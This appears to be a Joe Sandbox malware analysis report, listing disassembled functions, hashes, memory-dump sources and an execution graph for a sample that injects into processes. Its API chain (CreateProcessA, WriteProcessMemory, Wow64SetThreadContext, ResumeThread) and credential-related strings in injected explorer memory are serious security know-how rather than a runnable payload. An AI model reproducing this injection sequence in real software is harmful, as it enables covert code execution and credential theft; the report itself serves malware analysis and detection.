                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .$l$l$t
                                                                                                                                                  • API String ID: 0-168566397
                                                                                                                                                  • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                  • Instruction ID: 277ea332cefed435ba8b41533bd4371fff420f0d458db878ab05f04b443dc8dd
                                                                                                                                                  • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                  • Instruction Fuzzy Hash: BB215A74A24A0E9BDB08EFA8D4447EDBBF1FB58304F544A2ED209E3600DB7599558B84
                                                                                                                                                  Function 0F6E6E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .$l$l$t
                                                                                                                                                  • API String ID: 0-168566397
                                                                                                                                                  • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                  • Instruction ID: c8ef9173903b2f862e9923aa5c5ca885152d22c5d7cecd79749e5b856ba20cf1
                                                                                                                                                  • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                  • Instruction Fuzzy Hash: 1D214671A24B0D9BDB08EFA8D4447EEBAF1FB58304F50462ED049E3601DB799595CB88
                                                                                                                                                  Function 0F6E6E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .$l$l$t
                                                                                                                                                  • API String ID: 0-168566397
                                                                                                                                                  • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                  • Instruction ID: 805c667319ff199e90a452c304c4a139594f82c260b0c420be6776db4e728a14
                                                                                                                                                  • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                  • Instruction Fuzzy Hash: 15217771A24B0E9FDB08EFA8C0447AEBAF1FB58300F50462ED009E3601DB799591CB88
                                                                                                                                                  Function 0E666FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: auth$logi$pass$user
                                                                                                                                                  • API String ID: 0-2393853802
                                                                                                                                                  • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                  • Instruction ID: 79f54711e51263ce07f17bae1b79376fe6779555cae0aa2a8e43e825ccaedbff
                                                                                                                                                  • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                  • Instruction Fuzzy Hash: E821AE70624B0D8BCB05DF99A8906AEB7E1EF88344F00461AE84ADB344D7B0ED548BC6
                                                                                                                                                  Function 0E59DFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: auth$logi$pass$user
                                                                                                                                                  • API String ID: 0-2393853802
                                                                                                                                                  • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                  • Instruction ID: 245b735951fbc2d77bc42a926ddcdabcbf5542d2a0a494637fd685f94a117ee1
                                                                                                                                                  • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                  • Instruction Fuzzy Hash: 4F21AE30614B0D8BCB45DF9998916EEB7E2FF88344F044A19944ADB244DBB0D9158BD2
                                                                                                                                                  Function 0F6E6FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: auth$logi$pass$user
                                                                                                                                                  • API String ID: 0-2393853802
                                                                                                                                                  • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                  • Instruction ID: 3136c995658cbf322e754e5f24ab5f7746aa81c2030c7e26257d8d9c571422f7
                                                                                                                                                  • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                  • Instruction Fuzzy Hash: 4F21CD71614B0D8BCB05DF9998906EEBBE1EF88344F004619E40AEB346D7B4E954CBC6

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:10.3%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                  Total number of Nodes:199
                                                                                                                                                  Total number of Limit Nodes:10
                                                                                                                                                  execution_graph 32802 171d6a0 DuplicateHandle 32803 171d736 32802->32803 32804 7675072 32805 767507c 32804->32805 32808 7674f3c 32804->32808 32809 7676400 32805->32809 32827 7676410 32805->32827 32810 7676410 32809->32810 32845 7676de4 32810->32845 32850 7676bd9 32810->32850 32854 7676b7a 32810->32854 32858 767715b 32810->32858 32862 767683d 32810->32862 32868 767687e 32810->32868 32874 7676cb3 32810->32874 32879 7676b13 32810->32879 32884 7677114 32810->32884 32888 7676ff7 32810->32888 32893 7677169 32810->32893 32898 76770ca 32810->32898 32902 7676d0c 32810->32902 32907 767686e 32810->32907 32912 7676ac0 32810->32912 32811 767644e 32811->32808 32828 767642a 32827->32828 32830 7676de4 2 API calls 32828->32830 32831 7676ac0 2 API calls 32828->32831 32832 767686e 2 API calls 32828->32832 32833 7676d0c 2 API calls 32828->32833 32834 76770ca 2 API calls 32828->32834 32835 7677169 2 API calls 32828->32835 32836 7676ff7 2 API calls 32828->32836 32837 7677114 2 API calls 32828->32837 32838 7676b13 2 API calls 32828->32838 32839 7676cb3 2 API calls 32828->32839 32840 767687e 2 API calls 32828->32840 32841 767683d 2 API calls 32828->32841 32842 767715b 2 API calls 32828->32842 32843 7676b7a 2 API calls 32828->32843 32844 7676bd9 2 API calls 32828->32844 32829 767644e 32829->32808 32830->32829 32831->32829 32832->32829 32833->32829 32834->32829 32835->32829 32836->32829 32837->32829 32838->32829 32839->32829 32840->32829 32841->32829 32842->32829 32843->32829 32844->32829 32846 7676b3c 32845->32846 32847 7676b5d 32845->32847 32917 7674892 32846->32917 32921 7674898 32846->32921 32847->32811 32925 76747d6 32850->32925 32929 76747d8 32850->32929 32851 7676bf7 32933 76742c0 32854->32933 32937 76742c8 32854->32937 32855 7676b94 32855->32811 32859 7677113 32858->32859 32859->32858 32860 76742c0 Wow64SetThreadContext 32859->32860 32861 76742c8 Wow64SetThreadContext 32859->32861 32860->32859 32861->32859 32864 7676848 32862->32864 32863 7676939 32863->32811 32864->32863 32941 7674b15 32864->32941 32945 7674b20 32864->32945 32870 7676872 32868->32870 32869 7676939 32869->32811 32870->32869 32872 7674b15 CreateProcessA 32870->32872 32873 7674b20 CreateProcessA 32870->32873 32871 7676984 32871->32811 32872->32871 32873->32871 32875 7676d10 32874->32875 32877 7674892 WriteProcessMemory 32875->32877 32878 7674898 WriteProcessMemory 32875->32878 32876 76771dd 32877->32876 32878->32876 32880 7676b3c 32879->32880 32882 7674892 WriteProcessMemory 32880->32882 32883 7674898 WriteProcessMemory 32880->32883 32881 7676b5d 32881->32811 32882->32881 32883->32881 32886 76742c0 Wow64SetThreadContext 32884->32886 32887 76742c8 Wow64SetThreadContext 32884->32887 32885 7677113 32885->32884 32886->32885 32887->32885 32889 7677340 32888->32889 32891 7674892 WriteProcessMemory 32889->32891 32892 7674898 WriteProcessMemory 32889->32892 32890 7677364 32891->32890 32892->32890 32895 7676ac7 32893->32895 32894 7676af3 32894->32811 32895->32894 32949 7674210 32895->32949 32953 7674218 32895->32953 32957 7674980 32898->32957 32961 7674988 32898->32961 32899 76770f4 32903 7676d21 32902->32903 32905 7674892 WriteProcessMemory 32903->32905 32906 7674898 WriteProcessMemory 32903->32906 32904 76771dd 32905->32904 32906->32904 32908 76768a0 32907->32908 32910 7674b15 CreateProcessA 32908->32910 32911 7674b20 CreateProcessA 32908->32911 32909 7676984 32909->32811 32910->32909 32911->32909 32913 7676ac6 32912->32913 32915 7674210 ResumeThread 32913->32915 32916 7674218 ResumeThread 32913->32916 32914 7676af3 32914->32811 32915->32914 32916->32914 32918 7674898 WriteProcessMemory 32917->32918 32920 7674937 32918->32920 32920->32847 32922 76748e0 WriteProcessMemory 32921->32922 32924 7674937 32922->32924 32924->32847 32926 76747d8 VirtualAllocEx 32925->32926 32928 7674855 32926->32928 32928->32851 32930 7674818 VirtualAllocEx 32929->32930 32932 7674855 32930->32932 32932->32851 32934 76742c8 Wow64SetThreadContext 32933->32934 32936 7674355 32934->32936 32936->32855 32938 767430d Wow64SetThreadContext 32937->32938 32940 7674355 32938->32940 32940->32855 32942 7674b20 CreateProcessA 32941->32942 32944 7674d6b 32942->32944 32946 7674ba9 CreateProcessA 32945->32946 32948 7674d6b 32946->32948 32950 7674218 ResumeThread 32949->32950 32952 7674289 32950->32952 32952->32894 32954 7674258 ResumeThread 32953->32954 32956 7674289 32954->32956 32956->32894 32958 7674988 ReadProcessMemory 32957->32958 32960 7674a17 32958->32960 32960->32899 32962 76749d3 ReadProcessMemory 32961->32962 32964 7674a17 32962->32964 32964->32899 32795 7677620 32796 76777ab 32795->32796 32797 7677646 32795->32797 32797->32796 32799 7673150 32797->32799 32800 76778a0 PostMessageW 32799->32800 32801 767790c 32800->32801 32801->32797 32965 1714668 32966 171467a 32965->32966 32970 1714686 32966->32970 32971 1714779 32966->32971 32968 17146a5 32976 1713e1c 32970->32976 32972 171479d 32971->32972 32980 1714878 32972->32980 32984 1714888 32972->32984 32973 17147a7 32973->32970 32977 1713e27 32976->32977 32992 1715c70 32977->32992 32979 1716fe0 32979->32968 32981 17148af 32980->32981 32982 171498c 32981->32982 32988 171449c 32981->32988 32982->32973 32985 17148af 32984->32985 32986 171498c 32985->32986 32987 171449c CreateActCtxA 32985->32987 32986->32973 32987->32986 32989 1715918 CreateActCtxA 32988->32989 32991 17159db 32989->32991 32993 1715c7b 32992->32993 32996 1715c90 32993->32996 32995 1717105 32995->32979 32997 1715c9b 32996->32997 33000 1715cc0 32997->33000 32999 17171e2 32999->32995 33001 1715ccb 33000->33001 33004 1715cf0 33001->33004 33003 17172e5 33003->32999 33005 1715cfb 33004->33005 33007 17185eb 33005->33007 33010 171ac98 33005->33010 33006 1718629 33006->33003 33007->33006 33014 171cd80 33007->33014 33019 171acd0 33010->33019 33022 171acbf 33010->33022 33011 171acae 33011->33007 33015 171cd91 33014->33015 33016 171cdd5 33015->33016 33031 171cf40 33015->33031 33035 171cf2f 33015->33035 33016->33006 33026 171adc8 33019->33026 33020 171acdf 33020->33011 33023 171acd0 33022->33023 33025 171adc8 GetModuleHandleW 33023->33025 33024 171acdf 33024->33011 33025->33024 33027 171adfc 33026->33027 33028 171add9 33026->33028 33027->33020 33028->33027 33029 171b000 GetModuleHandleW 33028->33029 33030 171b02d 33029->33030 33030->33020 33032 171cf4d 33031->33032 33033 171cf87 33032->33033 33039 171b7a0 33032->33039 33033->33016 33036 171cf4d 33035->33036 33037 171cf87 33036->33037 33038 171b7a0 GetModuleHandleW 33036->33038 33037->33016 33038->33037 33040 171b7ab 33039->33040 33042 171dc98 33040->33042 33043 171d0a4 33040->33043 33042->33042 33044 171d0af 33043->33044 33045 1715cf0 GetModuleHandleW 33044->33045 33046 171dd07 33045->33046 33046->33042 33047 171d458 33048 171d49e GetCurrentProcess 33047->33048 33050 171d4f0 GetCurrentThread 33048->33050 33051 171d4e9 33048->33051 33052 171d526 33050->33052 33053 171d52d GetCurrentProcess 33050->33053 33051->33050 33052->33053 33056 171d563 33053->33056 33054 171d58b GetCurrentThreadId 33055 171d5bc 33054->33055 33056->33054

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 0171D448 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 546 171d448-171d4e7 GetCurrentProcess 550 171d4f0-171d524 GetCurrentThread 546->550 551 171d4e9-171d4ef 546->551 552 171d526-171d52c 550->552 553 171d52d-171d561 GetCurrentProcess 550->553 551->550 552->553 555 171d563-171d569 553->555 556 171d56a-171d585 call 171d627 553->556 555->556 559 171d58b-171d5ba GetCurrentThreadId 556->559 560 171d5c3-171d625 559->560 561 171d5bc-171d5c2 559->561 561->560
                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 0171D4D6
                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 0171D513
                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 0171D550
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0171D5A9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1764512568.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1710000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                                  • Opcode ID: 28dc0c7a0aa51badb69499cbe5ed251d484762e6723c485d7db797823f965160
                                                                                                                                                  • Instruction ID: f80d81552a0a25eb3dd7a7078951fa0149a8374786e7f415aa15353aec69cb00
                                                                                                                                                  • Opcode Fuzzy Hash: 28dc0c7a0aa51badb69499cbe5ed251d484762e6723c485d7db797823f965160
                                                                                                                                                  • Instruction Fuzzy Hash: D15157B09013498FDB18DFA9D548BDEBBF1EF88314F208459E419A73A4D7349984CF65
                                                                                                                                                  Function 0171D458 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 568 171d458-171d4e7 GetCurrentProcess 572 171d4f0-171d524 GetCurrentThread 568->572 573 171d4e9-171d4ef 568->573 574 171d526-171d52c 572->574 575 171d52d-171d561 GetCurrentProcess 572->575 573->572 574->575 577 171d563-171d569 575->577 578 171d56a-171d585 call 171d627 575->578 577->578 581 171d58b-171d5ba GetCurrentThreadId 578->581 582 171d5c3-171d625 581->582 583 171d5bc-171d5c2 581->583 583->582
                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 0171D4D6
                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 0171D513
                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 0171D550
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0171D5A9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1764512568.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1710000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                                  • Opcode ID: e7c9a5e0d3b08be6f5ca9bbbada323e18f8a171228a1b7576f418270af109926
                                                                                                                                                  • Instruction ID: 2df6a481a8a9b2b4e8e67c355c60f4e98fe76a567d98c4b4879e47bce49e3dc5
                                                                                                                                                  • Opcode Fuzzy Hash: e7c9a5e0d3b08be6f5ca9bbbada323e18f8a171228a1b7576f418270af109926
                                                                                                                                                  • Instruction Fuzzy Hash: EC5158B09013098FDB18DFAAD548BDEBBF1EF48314F208459E419A7394D7349984CF65
                                                                                                                                                  Function 07674B15 Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 636 7674b15-7674bb5 639 7674bb7-7674bc1 636->639 640 7674bee-7674c0e 636->640 639->640 641 7674bc3-7674bc5 639->641 647 7674c47-7674c76 640->647 648 7674c10-7674c1a 640->648 642 7674bc7-7674bd1 641->642 643 7674be8-7674beb 641->643 645 7674bd5-7674be4 642->645 646 7674bd3 642->646 643->640 645->645 649 7674be6 645->649 646->645 654 7674caf-7674d69 CreateProcessA 647->654 655 7674c78-7674c82 647->655 648->647 650 7674c1c-7674c1e 648->650 649->643 652 7674c41-7674c44 650->652 653 7674c20-7674c2a 650->653 652->647 656 7674c2e-7674c3d 653->656 657 7674c2c 653->657 668 7674d72-7674df8 654->668 669 7674d6b-7674d71 654->669 655->654 659 7674c84-7674c86 655->659 656->656 658 7674c3f 656->658 657->656 658->652 660 7674ca9-7674cac 659->660 661 7674c88-7674c92 659->661 660->654 663 7674c96-7674ca5 661->663 664 7674c94 661->664 663->663 666 7674ca7 663->666 664->663 666->660 679 7674dfa-7674dfe 668->679 680 7674e08-7674e0c 668->680 669->668 679->680 681 7674e00 679->681 682 7674e0e-7674e12 680->682 683 7674e1c-7674e20 680->683 681->680 682->683 684 7674e14 682->684 685 7674e22-7674e26 683->685 686 7674e30-7674e34 683->686 684->683 685->686 687 7674e28 685->687 688 7674e46-7674e4d 686->688 689 7674e36-7674e3c 686->689 687->686 690 7674e64 688->690 691 7674e4f-7674e5e 688->691 689->688 693 7674e65 690->693 691->690 693->693
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07674D56
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1775517656.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_7670000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: 1f696f3d2ae52333888fd19aaec8ab2a8942958630c2b66b3e2cda942ba7b77c
                                                                                                                                                  • Instruction ID: 9f048cf6f10a97ee20951338d794a8ae0fbf82f3492ada930429b1efce38b555
                                                                                                                                                  • Opcode Fuzzy Hash: 1f696f3d2ae52333888fd19aaec8ab2a8942958630c2b66b3e2cda942ba7b77c
                                                                                                                                                  • Instruction Fuzzy Hash: 4BA16CB1D0025ACFDB10CFA8C8457EDBBB2FF48350F1485A9D85AA7290DB749985CF91
                                                                                                                                                  Function 07674B20 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 694 7674b20-7674bb5 696 7674bb7-7674bc1 694->696 697 7674bee-7674c0e 694->697 696->697 698 7674bc3-7674bc5 696->698 704 7674c47-7674c76 697->704 705 7674c10-7674c1a 697->705 699 7674bc7-7674bd1 698->699 700 7674be8-7674beb 698->700 702 7674bd5-7674be4 699->702 703 7674bd3 699->703 700->697 702->702 706 7674be6 702->706 703->702 711 7674caf-7674d69 CreateProcessA 704->711 712 7674c78-7674c82 704->712 705->704 707 7674c1c-7674c1e 705->707 706->700 709 7674c41-7674c44 707->709 710 7674c20-7674c2a 707->710 709->704 713 7674c2e-7674c3d 710->713 714 7674c2c 710->714 725 7674d72-7674df8 711->725 726 7674d6b-7674d71 711->726 712->711 716 7674c84-7674c86 712->716 713->713 715 7674c3f 713->715 714->713 715->709 717 7674ca9-7674cac 716->717 718 7674c88-7674c92 716->718 717->711 720 7674c96-7674ca5 718->720 721 7674c94 718->721 720->720 723 7674ca7 720->723 721->720 723->717 736 7674dfa-7674dfe 725->736 737 7674e08-7674e0c 725->737 726->725 736->737 738 7674e00 736->738 739 7674e0e-7674e12 737->739 740 7674e1c-7674e20 737->740 738->737 739->740 741 7674e14 739->741 742 7674e22-7674e26 740->742 743 7674e30-7674e34 740->743 741->740 742->743 744 7674e28 742->744 745 7674e46-7674e4d 743->745 746 7674e36-7674e3c 743->746 744->743 747 7674e64 745->747 748 7674e4f-7674e5e 745->748 746->745 750 7674e65 747->750 748->747 750->750
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07674D56
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1775517656.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_7670000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: d8bac5d18d79e085c64def6ed6f003a3c139100c21bb84e28920402096570651
                                                                                                                                                  • Instruction ID: 3d8b3f474abf6179e1224dcc2dabdf15bb0c1ac48f7e5e7ee0c880c87c77e13b
                                                                                                                                                  • Opcode Fuzzy Hash: d8bac5d18d79e085c64def6ed6f003a3c139100c21bb84e28920402096570651
                                                                                                                                                  • Instruction Fuzzy Hash: 49917DB1D0025ACFDB10CFA8C8857EDBBB2FF48310F1485A9D85AA7290DB749985CF91
                                                                                                                                                  Function 0171ADC8 Relevance: 1.7, APIs: 1, Instructions: 205COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 751 171adc8-171add7 752 171ae03-171ae07 751->752 753 171add9-171ade6 call 171a120 751->753 754 171ae09-171ae13 752->754 755 171ae1b-171ae5c 752->755 760 171ade8 753->760 761 171adfc 753->761 754->755 762 171ae69-171ae77 755->762 763 171ae5e-171ae66 755->763 808 171adee call 171b051 760->808 809 171adee call 171b060 760->809 761->752 764 171ae79-171ae7e 762->764 765 171ae9b-171ae9d 762->765 763->762 769 171ae80-171ae87 call 171a12c 764->769 770 171ae89 764->770 768 171aea0-171aea7 765->768 766 171adf4-171adf6 766->761 767 171af38-171afb4 766->767 801 171afe0-171aff8 767->801 802 171afb6-171afde 767->802 772 171aeb4-171aebb 768->772 773 171aea9-171aeb1 768->773 771 171ae8b-171ae99 769->771 770->771 771->768 775 171aec8-171aed1 call 171a13c 772->775 776 171aebd-171aec5 772->776 773->772 782 171aed3-171aedb 775->782 783 171aede-171aee3 775->783 776->775 782->783 784 171af01-171af0e 783->784 785 171aee5-171aeec 783->785 791 171af31-171af37 784->791 792 171af10-171af2e 784->792 785->784 787 171aeee-171aefe call 171a14c call 171a15c 785->787 787->784 792->791 803 171b000-171b02b GetModuleHandleW 801->803 804 171affa-171affd 801->804 802->801 805 171b034-171b048 803->805 806 171b02d-171b033 803->806 804->803 806->805 808->766 809->766
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0171B01E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1764512568.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1710000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                  • Opcode ID: 98597875457673c846561e2620d36586e24ecbddbd3bbc949ef8cb734e975804
                                                                                                                                                  • Instruction ID: f20df7f91a6ad71d6d82ca609ea74e526c1c9d426fa6116ea8f20b67a70bd682
                                                                                                                                                  • Opcode Fuzzy Hash: 98597875457673c846561e2620d36586e24ecbddbd3bbc949ef8cb734e975804
                                                                                                                                                  • Instruction Fuzzy Hash: 8D8135B0A01B458FDB24DF2DD44579AFBF1FF88204F00892ED18A97A58D735E849CB90
                                                                                                                                                  Function 0171449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 920 171449c-17159d9 CreateActCtxA 923 17159e2-1715a3c 920->923 924 17159db-17159e1 920->924 931 1715a4b-1715a4f 923->931 932 1715a3e-1715a41 923->932 924->923 933 1715a51-1715a5d 931->933 934 1715a60 931->934 932->931 933->934 936 1715a61 934->936 936->936
                                                                                                                                                  APIs
                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 017159C9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1764512568.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1710000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Create
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                  • Opcode ID: de62824da77aba7579f120e72e029d7e88cf8f060d2418c25739e0f13a319ef4
                                                                                                                                                  • Instruction ID: c887e1064cf707ef168465f6b5c5f25c7273130997c732cf9ea4c79b747764d8
                                                                                                                                                  • Opcode Fuzzy Hash: de62824da77aba7579f120e72e029d7e88cf8f060d2418c25739e0f13a319ef4
                                                                                                                                                  • Instruction Fuzzy Hash: 9241B0B1C0071DCBDB24DFA9C884B9EBBB5BF8A314F20806AD409AB255DB756945CF90
                                                                                                                                                  Function 0171590C Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 937 171590c-1715910 938 171591c-17159d9 CreateActCtxA 937->938 940 17159e2-1715a3c 938->940 941 17159db-17159e1 938->941 948 1715a4b-1715a4f 940->948 949 1715a3e-1715a41 940->949 941->940 950 1715a51-1715a5d 948->950 951 1715a60 948->951 949->948 950->951 953 1715a61 951->953 953->953
                                                                                                                                                  APIs
                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 017159C9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.1764512568.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_1710000_SIZfuXT.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Create
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                  • Opcode ID: e6b50ee0d4b780e4899f8eae44a5108cb35718ab2f23e20c937fcdf09a9278c5
                                                                                                                                                  • Instruction ID: a0cd464976a9cebce8f432885585b6a30dcca96d524ecabbfb41db6e0ee24553
                                                                                                                                                  • Opcode Fuzzy Hash: e6b50ee0d4b780e4899f8eae44a5108cb35718ab2f23e20c937fcdf09a9278c5
